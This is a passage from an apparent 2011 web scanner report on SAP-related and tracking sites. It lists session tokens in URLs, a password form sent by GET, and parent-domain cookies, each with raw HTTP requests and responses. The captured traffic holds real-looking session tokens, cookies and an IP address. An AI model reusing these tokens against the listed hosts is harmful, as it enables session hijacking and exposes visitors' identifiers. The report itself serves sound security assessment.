Location: http://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


9.7. https://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/37021986/?&visitor=5140389589811&msessionkey=1316108311517485489&site=37021986&cmd=mTagUrl&lpCallId=653687120463-736978869550&protV=20&lpjson=1&SV%21impression-query-name=voice-sales-sap-sme-us-en-1&SV%21impression-query-room=voice-sales-sap-sme-us-en-1&id=2404879032&info=button-impression%3Avoice-sales-sap-sme-us-en-1%28SAP%20-%20Contact%20SAP%29&waitForVisitor=true&d=1318691650602&page=https%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Connection: Keep-Alive
Cookie: HumanClickKEY=1316108311517485489; HumanClickSiteContainerID_37021986=STANDALONE; ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; LivePersonID=LP i=5140389589811,d=1318691628

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:13:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 15:13:52 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"653687120463-736978869550","lpCallConfirm":"","lpData":[{"result":56}]}});

9.8. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sapglobalmarketingin.tt.omtrdc.net
Path:   /m2/sapglobalmarketingin/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/sapglobalmarketingin/sc/standard?mboxHost=store.businessobjects.com&mboxSession=1318689062767-959486&mboxPage=1318689062767-959486&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1318671062929&visitorID=50271dcd9baa4ef3893c9fb47c6b6fd7&visitorNamespace=sap&pageName=estores%3Aus%3Ahomepage&currencyCode=USD&channel=estores&server=estores&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1326&browserHeight=890&dynamicAccountSelection=true&dynamicAccountList=sapvbudev%3Ddigitalriver.com&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=true&linkDownloadFileTypes=rar%2Cexe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=streamwork.com%2Csapstreamwork.com%2Caboutsapcampbell.com%2Canalytics-usa.com%2Cestara.com%2Cbestsapchina.com%2Cbusinessobjects.com%2Cbusinessobjects.com.pl%2Cbusiness-objects.com.pl%2Cbusinessobjects.pl%2Cbusiness-objects.pl%2Ccareersatsap.com%2Ccfolder.de%2Ccfolders.com%2Ccfolders.de%2Ccfolders.net%2Ccrystalreports.com%2Cdigitalriver.com%2Cedusap.at%2Cfazi.at%2Cfazi.com%2Cfazi.de%2Cfuturefactoryinitiative.com%2Cfuturefactoryinitiative.org%2Cfuzzy.at%2Cfuzzy.ch%2Cfuzzy-informatik.com%2Cfuzzy-informatik.de%2Cfuzzy-online.com%2Cfuzzy-online.de%2Cinfommersion.com%2Condemand.com%2Csap.at%2Csap.bg%2Csap.biz%2Csap.ca%2Csap.ch%2Csap.cl%2Csap.cn%2Csap.co.at%2Csap.co.il%2Csap.co.jp%2Csap.co.kr%2Csap.co.nz%2Csap.co.th%2Csap.co.uk%2Csap.co.za%2Csap.com%2Csap.com.au%2Csap.com.cn%2Csap.com.pl%2Csap.com.sg%2Csap.com.tr%2Csap.com.tw%2Csap.cz%2Csap.de%2Csap.ee%2Csap.fi%2Csap.hk%2Csap.hr%2Csap.hu%2Csap.ie%2Csap.in%2Csap.info%2Csap.kz%2Csap.lu%2Csap.nl%2Csap.pl%2Csap.pt%2Csap.ro%2Csap.ru%2Csap.si%2Csap.sk%2Csap.tw%2Csap.ua%2Csap.us%2Csapag.de%2Csap-ag.de%2Csapamerica.com%2Csap-answer.com%2Csap-austria.com%2Csap-best-fit-adviser.com%2Csapbusinessbydesign.cn%2Csapbusinessbydesign.co.uk%2Csapbusinessbydesign.com%2Csapbusinessbydesign.de%2Csapbusinessbydesign.us%2Csapbusinessobjects.com.pl%2Csap-business-objects.com.pl%2Csapbusinessobjects.pl%2Csap-business-objects.pl%2Csapbusinessobjectsresponses.com%2Csapbusinessone.pl%2Csap-campbell.com%2Csapcampbell.net%2Csapcampbell.org%2Csapchina.com%2Csapclear.com%2Csapconfigurator.com%2Csapdesignguild.org%2Csap-event.jp%2Csapevents.com%2Csap-forum.de%2Csap-insights.com%2Csapkhimetrics.com%2Csaplabs.bg%2Csaplabs.co.in%2Csaplabs.fr%2Csaplabs.in%2Csapnetweaver.com%2Csapphirenow.com%2Csap-retail.de%2Csapsapphire.com%2Csapsem.com%2Csap-spectrum.com%2Csapstreamwork.com%2Csapteched.com%2Csapthai.com%2Csapturkiye.com.tr%2Csap-tv.com%2Csapventures.com%2Csapworldtour.com%2Csapworldtour2010.com%2Csteeb.de%2Csap.corp%2Csaplabs.com%2Csybase.com%2Csappartneredge.eu%2Cjavascript%3A%2Cstore.businessobjects.com&linkTrackVars=visitorID%2Cserver&linkTrackEvents=None&prop1=na&eVar1=estores%3Aus&hier1=estores%2Cna%2Cus&prop2=english&eVar2=english&eVar3=estores&prop5=us&prop8=new&eVar8=new&prop9=logN&eVar9=logN&eVar13=CG4DA4BC51&prop14=logN%7Cestores%3Aus%3Ahomepage&prop15=null%7Cestores%3Aus%3Ahomepage&eVar15=%7C&eVar18=%2B1&eVar19=estores%2Cna%2Cus&eVar20=estores%3Aus%3Ahomepage&eVar35=http%3A%2F%2Fwww.sap.com%2Findex.epx&eVar36=CG4DA4BC51&prop38=saturday%7C4%3A30pm&eVar38=saturday%7C4%3A30pm&prop47=1&prop50=estores%3A2011.04.18%7Cgl%3A2011.09.07&mboxURL=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.%2B77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: sapglobalmarketingin.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Sat, 15 Oct 2011 14:30:44 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318689062767-959486.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

9.9. https://teched2011madrid.sapevents.com/index.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://teched2011madrid.sapevents.com
Path:   /index.cfm

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /index.cfm?fuseaction=reg.Login&error=75&sEmail=&sTandC=Yes&sCountry=&CFID=960984&CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://teched2011madrid.sapevents.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:39 GMT
Content-Length: 48423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...

9.10. http://www.sapteched.com/emea/about/whoshouldattend.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.sapteched.com
Path:   /emea/about/whoshouldattend.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /emea/about/whoshouldattend.htm HTTP/1.1
Host: www.sapteched.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASTBDDD=DBGKJPDAPICNJLACGEPPFAMJ; __utma=48829220.526440815.1318688537.1318688537.1318688537.1; __utmb=48829220.2.10.1318688537; __utmc=48829220; __utmz=48829220.1318688537.1.1.utmcsr=teched2011madrid.sapevents.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:23:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 33557
Content-Type: text/html; Charset=utf-8
Expires: Sat, 15 Oct 2011 14:23:53 GMT
Cache-control: private
Content-Length: 33557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>SAP TechEd 201
...[SNIP]...
<td width="180" style="display:block; word-wrap: break-word"><script src="http://nmp.newsgator.com/NGBuzz/buzz.ashx?buzzId=215423&apiToken=8A9F478544194B85AC55E891BBE40862" type="text/javascript"></script>
...[SNIP]...

10. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET / HTTP/1.1
Host: www.sapbusinessoptimizer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Home</title>
<meta
...[SNIP]...
</ul>
   
   <form onsubmit="Login.submit('mini');" action="javascript:void(0);">
       <div class="field">
...[SNIP]...
</label>
           <input type="password" name="Password" id="mini_pass" class="text" value="Password" />
       </div>
...[SNIP]...

11. Cookie scoped to parent domain  previous  next
There are 71 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. https://s.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://s.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fpc.pl?a=10002109824374&v=4.47&enc=utf-8&f=https%3A//www.sap.com/sme/contactsap/index.epx&b=Contact%20SAP&c=sme&x=07&cf3=Contact_General&cf4=Contact_General&cf17=Global&e=http%3A//burp/show/12&flv=WIN%2010%2C3%2C183%2C10&d=Sat%2C%2015%20Oct%202011%2015%3A15%3A41%20UTC&n=5&g=en-us&h=Y&j=1920x1200&k=16&l=true&ittidx=0&fpc=M7bgHDDi%7CKd30fNBLaa%7Cfses10002109824374%3D%7CKd30fNBLaa%7CM7bgHDDi%7Cfvis10002109824374%3DZj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA%3D%3D%7C8M8o0780sT%7C8M8o0780sT%7C8M8o0780sT%7C8%7C8M8o0780sT%7C8M8o0780sT HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: s.analytics.yahoo.com
Connection: Keep-Alive
Cookie: B=bbb07qp77cca3&b=3&s=p1; itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|M|8M8o0780Hs|T; itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:15:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|T|8M8o078HsM|T; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=; path=/; domain=.analytics.yahoo.com
TS: 0 205 dc4_ird
Pragma: no-cache
Expires: Sat, 15 Oct 2011 15:15:24 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript

// First Party Cookies
// TS: 0 205 dc4_ird


11.2. http://www.sap.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sap.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.18CKMMM; path=/
Cache-Control: private
Content-Length: 0
Location: /index.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:42 GMT; path=/
Set-Cookie: session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; domain=.sap.com; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:42 GMT


11.3. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http%3A%2F%2Fcf.addthis.com%2Fred%2Fusync%3Fpid%3D6%26puid%3D%24UID HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://s7.addthis.com/static/r07/sh62.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Cookie: uuid2=2595517907636879217; anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LUMbNT[>XcvbRA4C$WRZ?#9'2MGirFg`7sCI.4J%bAJ=l!m^+^_v3JmS<A)1moZ?Hd3oR9w[++-fe/Lf@X:1j+#tuLV-.(`K

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=2595517907636879217; path=/; expires=Fri, 13-Jan-2012 15:28:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Sun, 16-Oct-2011 15:28:17 GMT; domain=.adnxs.com; HttpOnly
Location: http://cf.addthis.com/red/usync?pid=6&puid=2595517907636879217
Date: Sat, 15 Oct 2011 15:28:17 GMT
Content-Length: 0


11.4. http://ib.adnxs.com/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /px

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /px?id=22928&t=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ib.adnxs.com
Cookie: sess=1; uuid2=2911719892711954938; anj=Kfu=8fG6Q/Cxrx)0s]#%2L_'x%SEV/^U7g%1P6-Z

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=2911719892711954938; path=/; expires=Fri, 13-Jan-2012 13:51:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Sun, 16-Oct-2011 13:51:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG6Q/Cxrx)0s]#%2L_'x%SEV/^U7g%1P6-Z; path=/; expires=Fri, 13-Jan-2012 13:51:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 15 Oct 2011 13:51:40 GMT
Content-Length: 0


11.5. http://reservoir.marketstudio.net/reservoir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reservoir.marketstudio.net
Path:   /reservoir

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reservoir?d=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3D__RESID__%26rests%3D1318689037443&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession HTTP/1.1
Host: reservoir.marketstudio.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:30:39 GMT
Server: Apache
X-Server-Name: resweb@dc1web53
Set-Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN; path=/; domain=marketstudio.net; expires=Sun, 20-Oct-2030 01:09:39 GMT
Location: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Content-Length: 339
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://store.businessobjects.com/store/bobjamer
...[SNIP]...

11.6. http://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155 HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: HumanClickKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 15 Oct 2011 14:55:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Set-Cookie: LivePersonID=-546022977410-1318690536:-1:-1:-1:-1; expires=Sun, 14-Oct-2012 14:55:47 GMT; path=/hc/37021986; domain=.liveperson.net
Location: https://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


11.7. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scripts.omniture.com
Path:   /global/scripts/targeting/dyn_prop.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=f788d26b-a328-4c76-a75e-75f5d13f522a; campaign_stack=%5B%5B'natural_bookmark'%2C'1314743495330'%5D%5D; s_cid=natural_bookmark; _jsuid=229033120498741338; search_stack=%5B%5B'seo_other_referer'%2C'1314795804321'%5D%5D; sso_enabled=1; v1stsp=ABD4EE251C299F74; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; s_iid=38573; s_osc=38585; s_lv=1317139901232; s_sv_p1=1@26@s/7243/7019/7341/6423&e/15; mbox=check#true#1318631931|session#1318631777052-118529#1318633731|PC#1318631777052-118529.19#1319841471; mbox-staging=check#true#1318631939|session#1318631787015-280970#1318633739|PC#1318631787015-280970.19#1319841479

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Sat, 15 Oct 2011 17:47:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www5.dmz
Content-Length: 483
Content-Type: application/javascript
Date: Sat, 15 Oct 2011 13:47:00 GMT
Connection: close
Set-Cookie: omniture_unique=fe0e6c91699884f68443ba47d4700abf; path=/; domain=omniture.com
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=50.23.123.106',
